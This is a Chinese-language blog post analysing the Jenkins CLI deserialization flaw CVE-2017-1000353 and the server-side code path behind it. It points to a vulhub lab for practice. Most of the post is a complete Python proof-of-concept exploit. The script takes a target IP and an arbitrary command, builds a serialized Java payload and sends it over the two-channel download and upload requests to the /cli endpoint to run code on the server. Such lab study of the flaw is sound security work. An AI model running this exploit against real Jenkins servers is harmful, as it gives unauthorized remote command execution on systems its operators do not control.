jenkins 反序列化漏洞 cve-2017-1000353 淩亂°似流年 2021-08-31 02:59 496阅读 0赞 一、漏洞原理: 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 # 可以如下生成 session = uuid.uuid4() 1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向 ![format_png][] 对应代码段: def Download(url,session): headers = {'Side':'download'} headers['Content-type'] = 'application/x-www-form-urlencoded' headers['Session'] = session headers['Transfer-Encoding'] = 'chunked' try: response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True) except Exception,ex: print ex exit(0) print response.content 然后是第二个请求:双向信道发送组件,第一个请求被阻塞,一直到第二个请求被发送。此时session与之前保持一致,side改成upload。 ![format_png 1][] 数据部分格式规范如下: (1)前导码 前导码包含一个base64编码的序列化对象。“ *能力* ” 类型的序列化对象只是告诉服务器 客户端具有哪些能力(例如HTTP 分块编码)。 Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' (2)Proto部分 (可能是所说的额外字节) Proto = 'x00x00x00x00' (3)payload部分 在前导码和一些额外的字节之后,Jenkins服务器期望类型为Command的序列化对象。由于Jenkins不验证序列化对象,所以可以发送任何序列化对象。 def Payload_Init(command): global File_Serialization command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command) print command return_number = os.system(command) if return_number != 0: print "Call Jar Packet To Init The Payload Error" exit(0) File_Serialization = open("./payload.ser","rb").read() 所有第二个数据包发送的数据整合: def Create_Payload_Chunked(): yield Premle yield Proto yield File_Serialization 发送第二个数据包: def Upload_Chunked(url,session,data): headers = {'Side':'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding'] = None headers['Transfer-Encoding'] = 'chunked' headers['Cache-Control'] = 'no-cache' try: response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy) except Exception,ex: print ex exit(0) 整个攻击流程 def Attack(): print "start" session = str(uuid.uuid4()) thread_object = threading.Thread(target=Download,args=(Target,session)) thread_object.start() time.sleep(1) print "pwn" #Upload(URL, session, create_payload()) Upload_Chunked(Target,session,"asdf") 服务器端对应处理 反序列化command对象 ![format_png 2][] 然后这个方法在这里被调用 ![format_png 3][] 返回了这个序列化好的对象cmd read方法调用,把返回的对象赋值给了cmd,也就是被读进一个ReaderThread类型的线程。 ![format_png 4][] 该线程由类“ *CliEndpointResponse* ”中调用的“ *upload* ”方法触发。 ![format_png 5][] 在该方法中,HTTP主体数据被读取,并且调用“notify”方法来通知线程。 ![format_png 6][] 整体POC import os import uuid import gzip import zlib import time import urllib import socket import urllib3 import requests import threading from optparse import OptionParser #全局变量定义: #Proxy = {"http":"http://127.0.0.1:8090","https":"http://127.0.0.1:8090"}#HTTP、HTTPS协议代理设置 Proxy = None#HTTP、HTTPS协议代理设置 Target="http://%s:8080/cli"#攻击目标 Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' Proto = 'x00x00x00x00' File_Serialization = None socket.setdefaulttimeout(3) #全局函数定义 def Payload_Init(command): global File_Serialization command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command) print command return_number = os.system(command) if return_number != 0: print "Call Jar Packet To Init The Payload Error" exit(0) File_Serialization = open("./payload.ser","rb").read() def Download(url,session): headers = {'Side':'download'} headers['Content-type'] = 'application/x-www-form-urlencoded' headers['Session'] = session headers['Transfer-Encoding'] = 'chunked' try: response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True) except Exception,ex: print ex exit(0) print response.content ''' def Upload(url,session,data): headers = {'Side':'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding'] = None try: response = requests.post(url,data=data,headers=headers,proxies=Proxy) except Exception,ex: print ex exit(0) ''' def Upload_Chunked(url,session,data): headers = {'Side':'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding'] = None headers['Transfer-Encoding'] = 'chunked' headers['Cache-Control'] = 'no-cache' try: response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy) except Exception,ex: print ex exit(0) def Null_Payload(): yield " " """ def Create_Payload(): payload = Premle + Proto + File_Serialization return payload """ def Create_Payload_Chunked(): yield Premle yield Proto yield File_Serialization def Attack(): print "start" session = str(uuid.uuid4()) thread_object = threading.Thread(target=Download,args=(Target,session)) thread_object.start() time.sleep(1) print "pwn" #Upload(URL, session, create_payload()) Upload_Chunked(Target,session,"asdf") #程序入口 if __name__ == "__main__": parser = OptionParser() parser.add_option("-t","--target",dest="target",help="Target IP address!") parser.add_option("-c","--command",dest="command",help="The command to execute!") parser.add_option("-p","--protocol",dest="protocol",help="Protocl is HTTP or HTTPS!") (options, args) = parser.parse_args() optionslist = [options.target,options.command,options.protocol] if None in optionslist or "" in optionslist: print "Please check your input parameters!" Target = Target%options.target command = options.command protocol = options.protocol if protocol == "HTTP": pass elif protocol == "HTTPS": Target = Target.replace("http","https") else: print "Unknown Protocol!" Payload_Init(command) Attack() 靶机平台: [https://vulhub.org/\#/environments/jenkins/CVE-2017-1000353/][https_vulhub.org_environments_jenkins_CVE-2017-1000353] poc: [https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py][https_github.com_vulhub_CVE-2017-1000353_blob_master_exploit.py] [format_png]: /images/20210728/672b8e045b5b4bf88d563d8d17bbc190.png [format_png 1]: /images/20210728/c4d29a7657f54be687a276f322a6859f.png [format_png 2]: /images/20210728/13d5e751bd1b4f70ad9d1022b00f71e0.png [format_png 3]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE3LmNuYmxvZ3MuY29tL2Jsb2cvMTA3MDMyMS8yMDE3MTIvMTA3MDMyMS0yMDE3MTIxMzE1NTMzODMxNi0yMDkxMDk2Nzk5LnBuZw?x-oss-process=image/format,png [format_png 4]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE3LmNuYmxvZ3MuY29tL2Jsb2cvMTA3MDMyMS8yMDE3MTIvMTA3MDMyMS0yMDE3MTIxMzE1NTU1OTU5Ny0xNDA1NTgzMTkucG5n?x-oss-process=image/format,png [format_png 5]: /images/20210728/b6e40974347d42d9af319a7ae6ea263b.png [format_png 6]: /images/20210728/97238bdd86f14359aeee55131dae608c.png [https_vulhub.org_environments_jenkins_CVE-2017-1000353]: https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/ [https_github.com_vulhub_CVE-2017-1000353_blob_master_exploit.py]: https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py
还没有评论,来说两句吧...